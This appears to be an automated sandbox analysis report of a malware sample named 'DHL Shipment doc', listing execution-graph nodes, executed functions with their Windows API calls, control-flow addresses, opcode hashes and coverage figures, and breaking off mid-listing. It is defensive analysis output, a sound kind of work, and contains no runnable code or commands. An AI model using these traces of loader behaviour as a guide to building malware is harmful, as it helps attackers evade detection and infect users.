190a4b0 GetModuleHandleW 14194->14195 14196 190a4dd 14195->14196 14196->14184 14200 190a29b 14199->14200 14201 190a2b3 14200->14201 14205 190a510 LoadLibraryExW 14200->14205 14206 190a500 LoadLibraryExW 14200->14206 14201->14184 14202 190a2ab 14202->14201 14203 190a4b0 GetModuleHandleW 14202->14203 14204 190a4dd 14203->14204 14204->14184 14205->14202 14206->14202 14208 190a524 14207->14208 14210 190a549 14208->14210 14215 19095e0 14208->14215 14210->14194 14212 190a524 14211->14212 14213 190a549 14212->14213 14214 19095e0 LoadLibraryExW 14212->14214 14213->14194 14214->14213 14216 190a6f0 LoadLibraryExW 14215->14216 14218 190a769 14216->14218 14218->14210 14221 190c465 14219->14221 14220 190c49f 14220->14180 14221->14220 14227 190af5c 14221->14227 14224 190c465 14223->14224 14225 190af5c 3 API calls 14224->14225 14226 190c49f 14224->14226 14225->14226 14226->14180 14228 190af67 14227->14228 14229 190d198 14228->14229 14231 190cb84 14228->14231 14232 190cb8f 14231->14232 14233 1906d84 3 API calls 14232->14233 14234 190d207 14233->14234 14235 190d215 14234->14235 14240 190d270 14234->14240 14246 190ef78 14235->14246 14251 190ef90 14235->14251 14236 190d240 14236->14229 14241 190d231 14240->14241 14243 190d27a 14240->14243 14244 190ef90 2 API calls 14241->14244 14245 190ef78 2 API calls 14241->14245 14242 190d240 14242->14235 14244->14242 14245->14242 14248 190ef90 14246->14248 14247 190efcd 14247->14236 14248->14247 14257 190f410 14248->14257 14260 190f402 14248->14260 14253 190efc1 14251->14253 14254 190f00d 14251->14254 14252 190efcd 14252->14236 14253->14252 14255 190f410 2 API calls 14253->14255 14256 190f402 2 API calls 14253->14256 14254->14236 14255->14254 14256->14254 14258 190a288 2 API calls 14257->14258 14259 190f419 14258->14259 14259->14247 14261 190f3d4 14260->14261 14262 190f40a 14260->14262 14261->14247 14263 190a288 2 API calls 14262->14263 14264 190f419 14263->14264 14264->14247 14265 190c570 14266 190c575 GetCurrentProcess 14265->14266 14267 190c5e3 14266->14267 14268 190c5ea GetCurrentThread 14266->14268 14267->14268 14269 190c620 14268->14269 14270 190c627 GetCurrentProcess 14268->14270 14269->14270 14271 190c65d 14270->14271 14272 190c685 GetCurrentThreadId 14271->14272 14273 190c6b6 14272->14273 14274 190c798 14275 190c79d DuplicateHandle 14274->14275 14276 190c82e 14275->14276 14277 19040e8 14279 19040f3 14277->14279 14278 1904145 14279->14278 14281 1904229 14279->14281 14282 1904232 14281->14282 14284 1904287 14281->14284 14287 1904328 14282->14287 14291 1904319 14282->14291 14284->14279 14289 190434f 14287->14289 14288 190442c 14288->14288 14289->14288 14295 1903e30 14289->14295 14293 190434f 14291->14293 14292 190442c 14292->14292 14293->14292 14294 1903e30 CreateActCtxA 14293->14294 14294->14292 14296 19053b8 CreateActCtxA 14295->14296 14298 190547b 14296->14298

                              Executed Functions

                              Function 0190719C Relevance: 1.6, Strings: 1, Instructions: 366COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 98 190719c-190719d 99 19071f3-19071f8 98->99 100 190719f-19071a7 98->100 101 19071cf-19071d2 99->101 102 19071ae-19071bf 100->102 103 19075e7-19075ec 101->103 104 19071d8 101->104 119 1907844-190784e 102->119 120 19071c5-19071ca 102->120 103->101 105 1907025 104->105 106 1907197 104->106 107 190713a-1907140 call 1906cf4 104->107 108 19071fa-190720a 104->108 109 19071eb-19071f1 104->109 110 190720f-1907295 104->110 111 19071df-19071e9 call 1906a40 104->111 118 1907030-1907032 105->118 106->98 121 1907145-190715a 107->121 112 19075e2 108->112 109->99 109->100 110->119 137 190729b-1907309 110->137 111->101 123 190703a-19070fd 118->123 120->101 128 1907165 121->128 156 1907107-190712a 123->156 130 1907170-1907192 128->130 130->112 137->119 142 190730f-1907385 137->142 142->119 148 190738b-1907401 142->148 148->119 153 1907407-1907465 148->153 153->119 159 190746b-19074b2 153->159 158 1907130-1907135 156->158 158->112 159->119 162 19074b8-19074ff 159->162 162->119 165 1907505-190754c 162->165 165->119 168 1907552-1907586 165->168 172 1907591 168->172 173 190759c-190759e 172->173 174 19075a9-19075c1 173->174 177 19075c8-19075db 174->177 177->112
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.692690674.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1900000_DHL Shipment doc.jbxd
                              Similarity
                              • API ID:
                              • String ID: h1l
                              • API String ID: 0-2622859367
                              • Opcode ID: efc76fe3cc8b5165b6cdd6f22d4fbb4ee5cd8d1c5174aa2122a819954f78b436
                              • Instruction ID: 598795b35150b983b5e7aa130c938d14368bffc85801a9bc4ee5bca744f418d9
                              • Opcode Fuzzy Hash: efc76fe3cc8b5165b6cdd6f22d4fbb4ee5cd8d1c5174aa2122a819954f78b436
                              • Instruction Fuzzy Hash: 03F17F31A006598FCB15DF60C8807EAB3B2FF89304F21C599D90DAB291DB75AD86CF91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0190C560 Relevance: 6.1, APIs: 4, Instructions: 127threadCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • GetCurrentProcess.KERNEL32 ref: 0190C5D0
                              • GetCurrentThread.KERNEL32 ref: 0190C60D
                              • GetCurrentProcess.KERNEL32 ref: 0190C64A
                              • GetCurrentThreadId.KERNEL32 ref: 0190C6A3
                              Memory Dump Source
                              • Source File: 00000000.00000002.692690674.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1900000_DHL Shipment doc.jbxd
                              Similarity
                              • API ID: Current$ProcessThread
                              • String ID:
                              • API String ID: 2063062207-0
                              • Opcode ID: ea13c3fcbf1e165583734c1e5b6b3111f3cc648299ffa7fb5f8bff036bc4cd2f
                              • Instruction ID: b614d98db0c5396d9abea9cf2863d7c107e01ba1d3f566a235bf67ad808eded0
                              • Opcode Fuzzy Hash: ea13c3fcbf1e165583734c1e5b6b3111f3cc648299ffa7fb5f8bff036bc4cd2f
                              • Instruction Fuzzy Hash: 025187B49007498FDB14DFA9D988B9EBFF4EF89304F208599E419A7290C7346984CF65
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0190C570 Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • GetCurrentProcess.KERNEL32 ref: 0190C5D0
                              • GetCurrentThread.KERNEL32 ref: 0190C60D
                              • GetCurrentProcess.KERNEL32 ref: 0190C64A
                              • GetCurrentThreadId.KERNEL32 ref: 0190C6A3
                              Memory Dump Source
                              • Source File: 00000000.00000002.692690674.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1900000_DHL Shipment doc.jbxd
                              Similarity
                              • API ID: Current$ProcessThread
                              • String ID:
                              • API String ID: 2063062207-0
                              • Opcode ID: c2a985206f9b6705340956e2a6a9fe43fbe7d25ae029f82f3fbdfeb72218d723
                              • Instruction ID: ea0b94d0a04b6fb0b9d1705d39b93a306b9a07d8efa5adad5513e264cdbed9b2
                              • Opcode Fuzzy Hash: c2a985206f9b6705340956e2a6a9fe43fbe7d25ae029f82f3fbdfeb72218d723
                              • Instruction Fuzzy Hash: 4B5166B49007498FDB14DFAAC988B9EBBF4EF89304F208559E019A7390C734A944CF65
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0190A288 Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 43 190a288-190a29d call 190957c 46 190a2b3-190a2b7 43->46 47 190a29f 43->47 48 190a2b9-190a2c3 46->48 49 190a2cb-190a30c 46->49 96 190a2a5 call 190a510 47->96 97 190a2a5 call 190a500 47->97 48->49 54 190a319-190a327 49->54 55 190a30e-190a316 49->55 50 190a2ab-190a2ad 50->46 53 190a3e8-190a4a8 50->53 91 190a4b0-190a4db GetModuleHandleW 53->91 92 190a4aa-190a4ad 53->92 57 190a329-190a32e 54->57 58 190a34b-190a34d 54->58 55->54 59 190a330-190a337 call 1909588 57->59 60 190a339 57->60 61 190a350-190a357 58->61 66 190a33b-190a349 59->66 60->66 62 190a364-190a36b 61->62 63 190a359-190a361 61->63 67 190a378-190a381 call 1909598 62->67 68 190a36d-190a375 62->68 63->62 66->61 73 190a383-190a38b 67->73 74 190a38e-190a393 67->74 68->67 73->74 76 190a3b1-190a3be 74->76 77 190a395-190a39c 74->77 82 190a3c0-190a3de 76->82 83 190a3e1-190a3e7 76->83 77->76 78 190a39e-190a3ae call 19095a8 call 19095b8 77->78 78->76 82->83 93 190a4e4-190a4f8 91->93 94 190a4dd-190a4e3 91->94 92->91 94->93 96->50 97->50
                              APIs
                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0190A4CE
                              Memory Dump Source
                              • Source File: 00000000.00000002.692690674.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1900000_DHL Shipment doc.jbxd
                              Similarity
                              • API ID: HandleModule
                              • String ID:
                              • API String ID: 4139908857-0
                              • Opcode ID: c7fbefe397d7e82a9b22f5c4bd92519d33c586392c42d8acbc3bba440ae63b21
                              • Instruction ID: 41abb5df297bf138d29b157b58d360f79f4cf2852ebfb40f17568235d3720d81
                              • Opcode Fuzzy Hash: c7fbefe397d7e82a9b22f5c4bd92519d33c586392c42d8acbc3bba440ae63b21
                              • Instruction Fuzzy Hash: 24714470A00B058FDB25DF2AD45075ABBF5FF88204F108A2DE54ADBA90DB75E905CF91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 019053AC Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 179 19053ac-1905479 CreateActCtxA 181 1905482-19054dc 179->181 182 190547b-1905481 179->182 189 19054eb-19054ef 181->189 190 19054de-19054e1 181->190 182->181 191 1905500 189->191 192 19054f1-19054fd 189->192 190->189 194 1905501 191->194 192->191 194->194
                              APIs
                              • CreateActCtxA.KERNEL32(?), ref: 01905469
                              Memory Dump Source
                              • Source File: 00000000.00000002.692690674.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1900000_DHL Shipment doc.jbxd
                              Similarity
                              • API ID: Create
                              • String ID:
                              • API String ID: 2289755597-0
                              • Opcode ID: 80c0ff20c747e523f47ae2c4d381cee27689326c077da8e0ce8375ddfbe5fdd0
                              • Instruction ID: 527db6f52accf6cf5d1542bd6d674391c1343d0618b940bf664022702d05b216
                              • Opcode Fuzzy Hash: 80c0ff20c747e523f47ae2c4d381cee27689326c077da8e0ce8375ddfbe5fdd0
                              • Instruction Fuzzy Hash: 314125B1D00618CFDB24DFA9C884BCDBBB1BF88304F25815AD508AB251DB756945CF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01903E30 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 195 1903e30-1905479 CreateActCtxA 198 1905482-19054dc 195->198 199 190547b-1905481 195->199 206 19054eb-19054ef 198->206 207 19054de-19054e1 198->207 199->198 208 1905500 206->208 209 19054f1-19054fd 206->209 207->206 211 1905501 208->211 209->208 211->211
                              APIs
                              • CreateActCtxA.KERNEL32(?), ref: 01905469
                              Memory Dump Source
                              • Source File: 00000000.00000002.692690674.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1900000_DHL Shipment doc.jbxd
                              Similarity
                              • API ID: Create
                              • String ID:
                              • API String ID: 2289755597-0
                              • Opcode ID: 08e2ca503832491e762e24f9b1f9b64e1b0af4f13160972199fe845d7e8e3235
                              • Instruction ID: 111d02826136912483edf1fddb1a1f51e64a6d04d1ec13b424bd52b9b303ae0d
                              • Opcode Fuzzy Hash: 08e2ca503832491e762e24f9b1f9b64e1b0af4f13160972199fe845d7e8e3235
                              • Instruction Fuzzy Hash: CE41F270D00718CFDB24DFA9C884BDEBBB5BF88304F21805AD508AB251DB755945CF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0190C791 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 212 190c791-190c796 213 190c798-190c79c 212->213 214 190c79d-190c82c DuplicateHandle 212->214 213->214 215 190c835-190c852 214->215 216 190c82e-190c834 214->216 216->215
                              APIs
                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0190C81F
                              Memory Dump Source
                              • Source File: 00000000.00000002.692690674.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1900000_DHL Shipment doc.jbxd
                              Similarity
                              • API ID: DuplicateHandle
                              • String ID:
                              • API String ID: 3793708945-0
                              • Opcode ID: 1f0b2b6368d35f4ae524cc39d5e4d23b71e64d9e3ecf034675f82a68034fa19f
                              • Instruction ID: 33fd5f9ccfb62a4b12b4575d09fc5897ef46ed85af8fcc72c184df35494fd056
                              • Opcode Fuzzy Hash: 1f0b2b6368d35f4ae524cc39d5e4d23b71e64d9e3ecf034675f82a68034fa19f
                              • Instruction Fuzzy Hash: 032116B59002089FDB10CFA9D884ADEBBF8FB48324F14845AE918B3350C378A944DFA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0190C798 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 219 190c798-190c82c DuplicateHandle 221 190c835-190c852 219->221 222 190c82e-190c834 219->222 222->221
                              APIs
                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0190C81F
                              Memory Dump Source
                              • Source File: 00000000.00000002.692690674.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1900000_DHL Shipment doc.jbxd
                              Similarity
                              • API ID: DuplicateHandle
                              • String ID:
                              • API String ID: 3793708945-0
                              • Opcode ID: bf200dc92e2c6117069ab5b748361e620fe70227f54ded703eb8ee19bd52db77
                              • Instruction ID: 4310d31950711b2085d28268d72016b417a5d319fa75c73c0843a6b2cc0e17a8
                              • Opcode Fuzzy Hash: bf200dc92e2c6117069ab5b748361e620fe70227f54ded703eb8ee19bd52db77
                              • Instruction Fuzzy Hash: 6221D8B5D002499FDB10CF99D984ADEFBF8FB48324F14855AE914A3350D374A944CFA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0190A6E9 Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 225 190a6e9-190a730 227 190a732-190a735 225->227 228 190a738-190a767 LoadLibraryExW 225->228 227->228 229 190a770-190a78d 228->229 230 190a769-190a76f 228->230 230->229
                              APIs
                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0190A549,00000800,00000000,00000000), ref: 0190A75A
                              Memory Dump Source
                              • Source File: 00000000.00000002.692690674.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1900000_DHL Shipment doc.jbxd
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: cc2496f7bb364c53083687c189414823771272c8386c9a1ac90ee7d2175738a8
                              • Instruction ID: 45147fdf40c7300c4949acfb73698e0c04514dcdd621028a84e2885bf6a7f81c
                              • Opcode Fuzzy Hash: cc2496f7bb364c53083687c189414823771272c8386c9a1ac90ee7d2175738a8
                              • Instruction Fuzzy Hash: 5B2117B6C003099FDB20CFAAD884BDEFBF4EB88314F15851AE419A7600C379A545CFA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 019095E0 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 233 19095e0-190a730 236 190a732-190a735 233->236 237 190a738-190a767 LoadLibraryExW 233->237 236->237 238 190a770-190a78d 237->238 239 190a769-190a76f 237->239 239->238
                              APIs
                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0190A549,00000800,00000000,00000000), ref: 0190A75A
                              Memory Dump Source
                              • Source File: 00000000.00000002.692690674.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1900000_DHL Shipment doc.jbxd
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: 3402ddd229d50529e1ed5fb32c348ebfd72c824fe8807fa6977d6d280b3437de
                              • Instruction ID: 0da85b7d9ab0f4b02657844ef858768f89103d414b10f34cff19c4a981926fb7
                              • Opcode Fuzzy Hash: 3402ddd229d50529e1ed5fb32c348ebfd72c824fe8807fa6977d6d280b3437de
                              • Instruction Fuzzy Hash: 8E1117B6D003099FDB10CF9AC844BDEFBF8EB88324F15842AE519A7240C374A545CFA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0190A790 Relevance: 1.6, APIs: 1, Instructions: 50libraryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 242 190a790-190a79c 244 190a72e-190a730 242->244 245 190a79e-190a7ad 242->245 247 190a732-190a735 244->247 248 190a738-190a767 LoadLibraryExW 244->248 251 190a7b4-190a7c0 245->251 252 190a7af-190a7b3 245->252 247->248 249 190a770-190a78d 248->249 250 190a769-190a76f 248->250 250->249 256 190a7c2-190a7c9 251->256 257 190a7ca-190a7df call 1909598 251->257
                              APIs
                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0190A549,00000800,00000000,00000000), ref: 0190A75A
                              Memory Dump Source
                              • Source File: 00000000.00000002.692690674.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1900000_DHL Shipment doc.jbxd
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: 0cd97a92840aca24fd64d59e0fc1a2b2ec76ff07a237c1073bd3b2787b65bc7a
                              • Instruction ID: 97b70ef3ded2c32fea21b3c7aeb77c9005e1dca5f15c3eaf7660db95c49efe90
                              • Opcode Fuzzy Hash: 0cd97a92840aca24fd64d59e0fc1a2b2ec76ff07a237c1073bd3b2787b65bc7a
                              • Instruction Fuzzy Hash: 3F1100B6D003048FDB11CFA9D8047DABBF8EF85325F00805AE219E7240C379A805CFA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0190A468 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 261 190a468-190a4a8 262 190a4b0-190a4db GetModuleHandleW 261->262 263 190a4aa-190a4ad 261->263 264 190a4e4-190a4f8 262->264 265 190a4dd-190a4e3 262->265 263->262 265->264
                              APIs
                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0190A4CE
                              Memory Dump Source
                              • Source File: 00000000.00000002.692690674.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1900000_DHL Shipment doc.jbxd
                              Similarity
                              • API ID: HandleModule
                              • String ID:
                              • API String ID: 4139908857-0
                              • Opcode ID: 1d3462b8202129758206265ceac4a647224bced31bba0254794c0124916bd7da
                              • Instruction ID: e19d4527ae6009ce2955eb1024514ab17ac59afe1bd47ec13fff10f8b9f9da6c
                              • Opcode Fuzzy Hash: 1d3462b8202129758206265ceac4a647224bced31bba0254794c0124916bd7da
                              • Instruction Fuzzy Hash: 151113B5C003498FDB10CF9AC444BDEFBF8AB88224F11841AD419A7600C378A545CFA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Non-executed Functions

                              Function 0190F458 Relevance: .3, Instructions: 315COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.692690674.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1900000_DHL Shipment doc.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c0dd0e2deb3dad2e4083de82d5251e4798916b0989b16f80d8f0426272b9471e
                              • Instruction ID: 9b3d209424213da9823db4e5eabf4dcdb3a9f7a12370e3dacc888b0783798841
                              • Opcode Fuzzy Hash: c0dd0e2deb3dad2e4083de82d5251e4798916b0989b16f80d8f0426272b9471e
                              • Instruction Fuzzy Hash: 6812B8F14917468BD310EF65F69C1893BA1F7E6328F70C289D2611BAD9DBB8114ACF84
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0190CE54 Relevance: .3, Instructions: 265COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.692690674.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1900000_DHL Shipment doc.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 08ba2fbe5c0c08d835caf814fe1a285726949a35f9b2edafdea9d0c506940a83
                              • Instruction ID: 5f9f10d87ab376b68cd4b833650e5dad9479c3dca16d5809fc6cc0289b185e05
                              • Opcode Fuzzy Hash: 08ba2fbe5c0c08d835caf814fe1a285726949a35f9b2edafdea9d0c506940a83
                              • Instruction Fuzzy Hash: 95A19132E0061ACFCF06DFB5C9445DEBBB6FF84301B15856AE909BB265EB31A945CB40
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0190F456 Relevance: .2, Instructions: 218COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.692690674.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1900000_DHL Shipment doc.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e908b4463019990ad79f7b99da9fde3e1aa721625ff7301feb37b67ef0c6c723
                              • Instruction ID: 9d9ab5a6988eead35478578e5f5c119513c66304d2f8a36264141977e265530d
                              • Opcode Fuzzy Hash: e908b4463019990ad79f7b99da9fde3e1aa721625ff7301feb37b67ef0c6c723
                              • Instruction Fuzzy Hash: 04C1F9B14517458BD710EF65FA8C1893B71FBE6328F708289D2612BAD8DFB8114ACF94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Execution Graph

                              Execution Coverage:9.1%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:3.1%
                              Total number of Nodes:678
                              Total number of Limit Nodes:74
                              execution_graph 14863 41d4b0 14866 419c00 14863->14866 14867 419c26 14866->14867 14878 408b70 14867->14878 14869 419c32 14870 419c79 14869->14870 14886 40d180 14869->14886 14872 419c47 14873 419c5c 14872->14873 14934 418940 14872->14934 14898 40a620 14873->14898 14876 419c6b 14877 418940 2 API calls 14876->14877 14877->14870 14937 408ac0 14878->14937 14880 408b7d 14881 408b84 14880->14881 14949 408a60 14880->14949 14881->14869 14887 40d1ac 14886->14887 15444 40a020 14887->15444 14889 40d1be 15448 40d090 14889->15448 14892 40d1f1 14895 40d202 14892->14895 14897 418720 2 API calls 14892->14897 14893 40d1d9 14894 40d1e4 14893->14894 14896 418720 2 API calls 14893->14896 14894->14872 14895->14872 14896->14894 14897->14895 14899 40a645 14898->14899 14900 40a020 LdrLoadDll 14899->14900 14901 40a69c 14900->14901 15464 409ca0 14901->15464 14903 40a913 14903->14876 14904 40a6c2 14904->14903 15473 4133b0 14904->15473 14906 40a707 14906->14903 15476 4079e0 14906->15476 14908 40a74b 14908->14903 15483 418790 14908->15483 14912 40a7a1 14913 40a7a8 14912->14913 14915 4182a0 LdrLoadDll 14912->14915 14914 41a0b0 2 API calls 14913->14914 14916 40a7b5 14914->14916 14917 40a7e5 14915->14917 14916->14876 14918 40a7f2 14917->14918 14921 40a802 14917->14921 14919 41a0b0 2 API calls 14918->14919 14920 40a7f9 14919->14920 14920->14876 14922 40d210 LdrLoadDll 14921->14922 14923 40a876 14922->14923 14923->14913 14924 40a881 14923->14924 14925 41a0b0 2 API calls 14924->14925 14926 40a8a5 14925->14926 15493 4182f0 14926->15493 14929 4182a0 LdrLoadDll 14930 40a8e0 14929->14930 14930->14903 15496 4180b0 14930->15496 14933 418940 2 API calls 14933->14903 14935 4191f0 LdrLoadDll 14934->14935 14936 41895f ExitProcess 14935->14936 14936->14873 14968 416e60 14937->14968 14941 408ae6 14941->14880 14942 408adc 14942->14941 14975 419540 14942->14975 14944 408b23 14944->14941 14986 4088e0 14944->14986 14946 408b43 14992 408330 14946->14992 14948 408b55 14948->14880 14950 408a7a 14949->14950 14951 419830 LdrLoadDll 14949->14951 15427 419830 14950->15427 14951->14950 14954 419830 LdrLoadDll 14955 408aa1 14954->14955 14956 40cf80 14955->14956 14957 40cf99 14956->14957 15431 409ea0 14957->15431 14959 40cfac 15435 418470 14959->15435 14962 408b95 14962->14869 14964 40cfd2 14965 40cffd 14964->14965 15441 4184f0 14964->15441 14967 418720 2 API calls 14965->14967 14967->14962 14969 416e6f 14968->14969 14996 413e60 14969->14996 14971 408ad3 14972 416d10 14971->14972 15028 418890 14972->15028 14976 419559 14975->14976 15035 413a60 14976->15035 14978 419571 14979 41957a 14978->14979 15074 419380 14978->15074 14979->14944 14981 41958e 14981->14979 15092 418190 14981->15092 15401 406e30 14986->15401 14988 408901 14988->14946 14989 4088fa 14989->14988 15414 4070f0 14989->15414 14993 408358 14992->14993 15420 409d70 14993->15420 14995 40838e 14995->14948 14997 413e6e 14996->14997 14999 413e7a 14996->14999 14997->14999 15001 4142e0 14997->15001 14999->14971 15006 413fe0 15001->15006 15003 4142f8 15004 413e60 LdrLoadDll 15003->15004 15005 413fcc 15003->15005 15004->15005 15005->14971 15008 414005 15006->15008 15007 414074 15007->15003 15008->15007 15020 409b50 15008->15020 15010 4140a6 15015 41414b 15010->15015 15024 41a350 15010->15024 15013 414144 15013->15015 15018 4142e0 LdrLoadDll 15013->15018 15014 4141b1 15014->15015 15016 4142e0 LdrLoadDll 15014->15016 15015->15003 15017 4141e3 15016->15017 15017->15003 15019 4141a7 15018->15019 15019->15003 15021 409b74 15020->15021 15022 409bb0 LdrLoadDll 15021->15022 15023 409b7b 15021->15023 15022->15023 15023->15010 15025 41a360 15024->15025 15027 4140ed 15024->15027 15026 413e60 LdrLoadDll 15025->15026 15026->15027 15027->15013 15027->15014 15027->15015 15031 4191f0 15028->15031 15030 416d25 15030->14942 15032 419222 15031->15032 15033 419200 15031->15033 15032->15030 15034 413e60 LdrLoadDll 15033->15034 15034->15032 15036 413d95 15035->15036 15046 413a74 15035->15046 15036->14978 15039 413ba0 15101 4185f0 15039->15101 15040 413b83 15158 4186f0 15040->15158 15043 413bc7 15045 41a0b0 2 API calls 15043->15045 15044 413b8d 15044->14978 15048 413bd3 15045->15048 15046->15036 15098 417ee0 15046->15098 15047 413d59 15050 418720 2 API calls 15047->15050 15048->15044 15048->15047 15049 413d6f 15048->15049 15054 413c62 15048->15054 15183 4137a0 15049->15183 15052 413d60 15050->15052 15052->14978 15053 413d82 15053->14978 15055 413cc9 15054->15055 15057 413c71 15054->15057 15055->15047 15056 413cdc 15055->15056 15174 418570 15056->15174 15059 413c76 15057->15059 15060 413c8a 15057->15060 15161 413660 15059->15161 15063 413ca7 15060->15063 15064 413c8f 15060->15064 15063->15052 15116 413420 15063->15116 15104 413700 15064->15104 15066 413c80 15066->14978 15070 413c9d 15070->14978 15071 413cbf 15071->14978 15073 413d48 15073->14978 15075 419386 15074->15075 15076 4193a3 15075->15076 15248 41a030 15075->15248 15076->14981 15078 4193c4 15251 413070 15078->15251 15080 419410 15080->14981 15081 4193e7 15081->15080 15082 413070 3 API calls 15081->15082 15085 419409 15082->15085 15084 41949a 15086 4194aa 15084->15086 15368 419190 15084->15368 15085->15080 15276 4143a0 15085->15276 15286 419000 15086->15286 15089 4194d8 15365 418150 15089->15365 15093 4181ac 15092->15093 15094 4191f0 LdrLoadDll 15092->15094 15095 41a0b0 15093->15095 15094->15093 15398 418900 15095->15398 15097 4195e9 15097->14944 15099 4191f0 LdrLoadDll 15098->15099 15100 413b54 15099->15100 15100->15039 15100->15040 15100->15044 15102 41860c NtCreateFile 15101->15102 15103 4191f0 LdrLoadDll 15101->15103 15102->15043 15103->15102 15105 41371c 15104->15105 15106 418570 LdrLoadDll 15105->15106 15107 41373d 15106->15107 15108 413744 15107->15108 15109 413758 15107->15109 15111 418720 2 API calls 15108->15111 15110 418720 2 API calls 